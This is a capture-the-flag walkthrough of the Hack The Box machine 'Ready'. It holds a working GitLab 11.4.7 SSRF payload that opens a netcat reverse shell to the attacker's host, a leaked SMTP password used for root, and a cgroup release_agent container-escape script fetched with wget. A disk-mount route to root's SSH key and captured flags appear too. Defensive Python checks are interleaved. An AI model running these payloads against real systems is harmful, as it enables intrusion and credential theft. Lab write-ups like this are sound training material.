Hack The Box walkthrough: Ready

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 12 Dec 2020
IP: 10.10.10.220

  • my htb rank

Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.220
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
5080/tcp open http nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So two ports are open: 22 (SSH) and 5080 (HTTP).

Port 5080

There is a simple GitLab sign-in page.

Let's register an account.

And we are logged in.

After some enumeration I found an interesting thing.

The GitLab version is shown, with an "update asap" notice on a red background, so this version seems to be vulnerable.

After some googling I found an interesting article by LiveOverflow.

  • GitLab 11.4.7 Remote Code Execution

I suggest watching this video for a better understanding.

  • GitLab 11.4.7 Remote Code Execution - Real World CTF 2018

After reading the article and watching the full video, I understood that we can get a reverse shell through the method he shows in the video.

Let's try it real quick.

Step 1

Click on new project.

Now click on Import project.

Click repo-by-url

Step 2

Now we need the payload shown in the video, URL-encoded.

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 10.10.14.2 9001 -e /bin/bash \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git

Now URL-encode the payload:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%2010%2E10%2E14%2E2%209001%20%2de%20%2fbin%2fbash%20%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git

Now paste this payload into the Git repository URL field.

Before clicking Create Project, start your netcat listener on port 9001.

Now click Create project.

Let's check our netcat listener.

┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:37142.
id
uid=998(git) gid=998(git) groups=998(git)
whoami
git
python -c 'import pty; pty.spawn("/bin/bash")'
id
uid=998(git) gid=998(git) groups=998(git)
whoami
git
python3 -c 'import pty; pty.spawn("/bin/bash")'
git@gitlab:~/gitlab-rails/working$ id
id
uid=998(git) gid=998(git) groups=998(git)
git@gitlab:~/gitlab-rails/working$ whoami
whoami
git

Boom, we got the reverse shell as git.
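The chain above works because the import form accepted a git:// URL pointing at an IPv4-mapped IPv6 loopback address and let CR/LF sequences through to Redis. The following is an added example (my own code, not GitLab's and not from the original post) of the input validation an import endpoint should apply; the function name and the sample URLs are my own, and the github.com URL is only a constructed well-formed input.

```python
import ipaddress
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Raw control characters, or percent-encoded CR/LF that the downstream client
# (here: git talking to the remote) would decode back into line breaks.
CONTROL_RE = re.compile(r"[\x00-\x20\x7f]|%0[dDaA]")


def validate_import_url(url):
    """Return (ok, reason). Refuses the SSRF/CRLF shape used against GitLab 11.4.7."""
    if CONTROL_RE.search(url):
        return False, "control characters or encoded CR/LF in URL"
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. malformed bracketed IPv6 host
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed (git://, file:// and friends refused)"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: the same address test must be repeated on the resolved
        # address at connect time, or a name that resolves to 127.0.0.1 slips through.
        return True, "hostname; re-check the resolved address before connecting"
    # Unwrap IPv4-mapped IPv6 so [::ffff:127.0.0.1] is judged as 127.0.0.1.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if not addr.is_global:  # loopback, RFC 1918, link-local, unspecified ...
        return False, f"address {addr} is not publicly routable"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the walkthrough's payload host plus a few benign URLs.
    for candidate in (
        "git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ssrf.git",
        "https://[::ffff:127.0.0.1]/repo.git",
        "https://example.org/a%0D%0Ab.git",
        "https://github.com/example/repo.git",
    ):
        print(candidate, "->", validate_import_url(candidate))
```

The order of the checks matters: the control-character test runs on the raw string because urlsplit silently strips tab and newline characters, and the IPv4-mapped unwrap runs before the routability test because `::ffff:127.0.0.1` is not itself reported as loopback by the IPv6 class.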

We are inside a docker container.

After some enumeration I found an interesting file called gitlab.rb inside the /opt/backup directory.

git@gitlab:/opt/backup$ ls
ls
docker-compose.yml gitlab-secrets.json gitlab.rb

Looking through the file contents, I found a password:

git@gitlab:/opt/backup$ cat gitlab.rb | grep password
cat gitlab.rb | grep password
...
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
...
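A backup copy of gitlab.rb with a live SMTP password in it is exactly what a secret scan over backup directories is meant to catch. The scanner below is an added example of my own, not code from the post or from GitLab; the config fragment it runs on is constructed for the demonstration and the credential values in it are placeholders, not the box's password.

```python
import re

# Constructed sample of an omnibus gitlab.rb fragment (placeholder values only).
SAMPLE_GITLAB_RB = """\
external_url 'http://gitlab.example'
gitlab_rails['smtp_enable'] = true
gitlab_rails['smtp_address'] = "smtp.example"
gitlab_rails['smtp_user_name'] = "gitlab"
gitlab_rails['smtp_password'] = "EXAMPLE-smtp-secret-123"
# gitlab_rails['db_password'] = "commented-out-value"
gitlab_rails['initial_root_password'] = ""
postgresql['sql_user_password'] = 'EXAMPLE-db-hash'
"""

# Setting names whose quoted values are credentials.
SECRET_KEY_RE = re.compile(r"(password|passwd|secret|token|private_key)", re.I)
# One `key = "value"` or `key = 'value'` assignment per line.
ASSIGN_RE = re.compile(
    r"""^\s*(?P<key>[A-Za-z_][\w\[\]'"]*)\s*=\s*(?P<q>["'])(?P<val>.*?)(?P=q)\s*$"""
)


def mask(value):
    """Keep only the first and last character so the report does not leak the secret."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[0] + "*" * (len(value) - 2) + value[-1]


def find_hardcoded_secrets(text):
    """Return [{'line', 'key', 'value'}] for every live credential assignment."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # commented-out settings are not live credentials
        m = ASSIGN_RE.match(line)
        if not m or not SECRET_KEY_RE.search(m.group("key")):
            continue
        value = m.group("val")
        if value == "":
            continue  # empty string means the setting is unset
        findings.append({"line": lineno, "key": m.group("key"), "value": mask(value)})
    return findings


if __name__ == "__main__":
    for f in find_hardcoded_secrets(SAMPLE_GITLAB_RB):
        print(f"line {f['line']}: {f['key']} = {f['value']}")
```

Pointing `find_hardcoded_secrets` at the real file is a one-liner (`open("/opt/backup/gitlab.rb").read()`); the masking keeps the output safe to paste into a ticket, which is the part most ad-hoc grep-based checks get wrong.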

Let's switch user with it real quick.

su
Password: wW59U!ZKMbG9+*#h

root@gitlab:/opt/backup# id
id
uid=0(root) gid=0(root) groups=0(root)
root@gitlab:/opt/backup# whoami
whoami
root

And we are root inside the Docker container.

Now we can read user.txt.

root@gitlab:~# find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/dude/user.txt
root@gitlab:~# cat /home/dude/user.txt
cat /home/dude/user.txt
e1e30b052b6ec0670698805d745e7682

Privilege escalation, way 1

After some enumeration I found nothing obvious for privesc.

So I searched Google for privilege escalation inside a Docker container and found an interesting article.

  • Escaping Docker Privileged Containers

After reading the article I got a rough idea of how to privesc.

Step 1

First we need our SSH public key.

┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# cat /root/.ssh/id_rsa.pub
ssh-rsa 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 root@kali

Step 2

Now we need to create a file called root.sh and put the contents of your own id_rsa.pub in it.

root.sh:

#!/bin/sh
# Create a cgroup (rdma controller) that we control and enable notify_on_release on it
mkdir /tmp/luci12 && mount -t cgroup -o rdma cgroup /tmp/luci12 && mkdir /tmp/luci12/xx
echo 1 > /tmp/luci12/xx/notify_on_release
# Find this container's overlay upperdir on the host, so the host can locate /cmd
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/luci12/release_agent

# The release agent the host runs: drop our public key into root's authorized_keys
echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa 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 root@kali' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
# Add a short-lived process to the cgroup; when it exits, the release agent fires on the host
sh -c "echo \$\$ > /tmp/luci12/xx/cgroup.procs"

Step 3

Start a Python HTTP server on your machine.

Then fetch the file from inside the Docker container.

┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.220 - - [16/Dec/2020 05:08:03] "GET /root.sh HTTP/1.1" 200 -
root@gitlab:~# cd /tmp
cd /tmp
root@gitlab:/tmp# ls
ls
gitaly-ruby896015435
root@gitlab:/tmp# wget http://10.10.14.2/root.sh
wget http://10.10.14.2/root.sh
--2020-12-16 10:11:41-- http://10.10.14.2/root.sh
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375 [text/x-sh]
Saving to: 'root.sh'

root.sh 100%[===================>] 375 --.-KB/s in 0s

2020-12-16 10:11:41 (46.7 MB/s) - 'root.sh' saved [375/375]

root@gitlab:/tmp# chmod 777 *
chmod 777 *
root@gitlab:/tmp# ./root.sh
./root.sh

Now we can use our id_rsa to SSH into the host as root:

┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# ssh -i id_rsa root@10.10.10.220
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 16 Dec 2020 10:33:53 AM UTC

System load: 0.1
Usage of /: 65.2% of 17.59GB
Memory usage: 78%
Swap usage: 0%
Processes: 333
Users logged in: 0
IPv4 address for br-bcb73b090b3f: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.220
IPv6 address for ens160: dead:beef::250:56ff:feb9:8278

=> There are 6 zombie processes.

* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

https://microk8s.io/high-availability

170 updates can be installed immediately.
73 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Dec 13 15:04:10 2020 from 10.10.14.5
root@ready:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:~# whoami
root
root@ready:~# ls
docker-gitlab ready-channel root.txt snap
root@ready:~# cat root.txt
b7f98681505cd39066f67147b103c2b3

And we got the root flag.

If you want to learn more about how this privesc works, check this article.

  • Understanding Docker container escapes

Privilege escalation, way 2

We are root inside the container.

Now I tried a "new mount" inside the container (read about it here):

root@gitlab:/tmp# mkdir /tmp/test
mkdir /tmp/test
root@gitlab:/tmp# mount /dev/sda2 /tmp/test
mount /dev/sda2 /tmp/test
root@gitlab:/tmp# cat /tmp/test/root/.ssh/id_rsa
cat /tmp/test/root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

Now log in over SSH using the recovered private key, saved locally as id_rsa1:

┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# ssh -i id_rsa1 10.10.10.220
load pubkey "id_rsa1": invalid format
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information disabled due to load higher than 4.0

* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

https://microk8s.io/high-availability

170 updates can be installed immediately.
73 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Dec 14 16:49:36 2020 from 10.10.14.33
root@ready:~# id && whoami && hostname
uid=0(root) gid=0(root) groups=0(root)
root
ready
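Both escape routes, the cgroup release_agent trick in way 1 and mounting /dev/sda2 in way 2, only work because the container runs privileged: it has CAP_SYS_ADMIN to mount cgroupfs and it can see the host's block devices. The checks below are an added example of my own (not from the post, the Trail of Bits article or GitLab) of how a defender can audit for that condition from inside a container and from its docker-compose.yml; the CapEff values and the compose fragment are constructed samples, and the capability bit numbers are the ones from linux/capability.h.

```python
import os
import re

# Capabilities that, granted to a container, give it a path to the host
# (bit numbers from linux/capability.h).
ESCAPE_CAPS = {
    2: "CAP_DAC_READ_SEARCH",
    16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}


def escape_relevant_caps(capeff_hex):
    """Decode a CapEff value from /proc/<pid>/status and list the risky capabilities in it."""
    mask = int(capeff_hex, 16)
    return [name for bit, name in sorted(ESCAPE_CAPS.items()) if mask & (1 << bit)]


def read_own_capeff():
    """Effective capability mask of the current process, as the hex string the kernel prints."""
    with open("/proc/self/status") as fh:
        for line in fh:
            if line.startswith("CapEff:"):
                return line.split()[1]
    return "0"


def exposed_host_disks(dev_entries):
    """Pick host block devices out of a /dev listing; --privileged exposes all of them."""
    return sorted(d for d in dev_entries if re.match(r"^(sd[a-z]|vd[a-z]|xvd[a-z]|nvme\d+n\d+)", d))


def privileged_services(compose_text):
    """Minimal line scanner (no PyYAML dependency) for services declared privileged: true."""
    flagged, current, in_services = [], None, False
    for raw in compose_text.splitlines():
        line = raw.rstrip()
        if not line or line.lstrip().startswith("#"):
            continue
        indent = len(line) - len(line.lstrip())
        if indent == 0:                      # top-level key
            in_services = line.strip() == "services:"
            current = None
        elif in_services and indent == 2 and line.strip().endswith(":"):
            current = line.strip()[:-1]      # service name
        elif in_services and current and line.strip() == "privileged: true":
            flagged.append(current)
    return flagged


# Constructed docker-compose.yml fragment for the demonstration (not the box's file).
SAMPLE_COMPOSE = """\
version: "3"
services:
  gitlab:
    image: gitlab/gitlab-ce
    privileged: true
    ports:
      - "5080:80"
  redis:
    image: redis
"""


def main():
    caps = escape_relevant_caps(read_own_capeff())
    print("escape-relevant capabilities:", caps or "none")
    print("host block devices visible:", exposed_host_disks(os.listdir("/dev")) or "none")
    print("privileged services in sample compose:", privileged_services(SAMPLE_COMPOSE))


if __name__ == "__main__":
    main()
```

Run inside a default (non-privileged) container the first two lines come back empty, because Docker's default capability set does not include CAP_SYS_ADMIN and /dev holds only pseudo-devices; a `privileged: true` service such as the one in the sample compose fails all three checks, which is the configuration both escalation paths on this box depend on.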

Summary of knowledge

  • GitLab 11.4.7 Remote Code Execution
  • password disclosure in /opt/backup/gitlab.rb
  • Escaping Docker Privileged Containers to read id_rsa file

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a CTFer, reverse engineer, IoTer, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…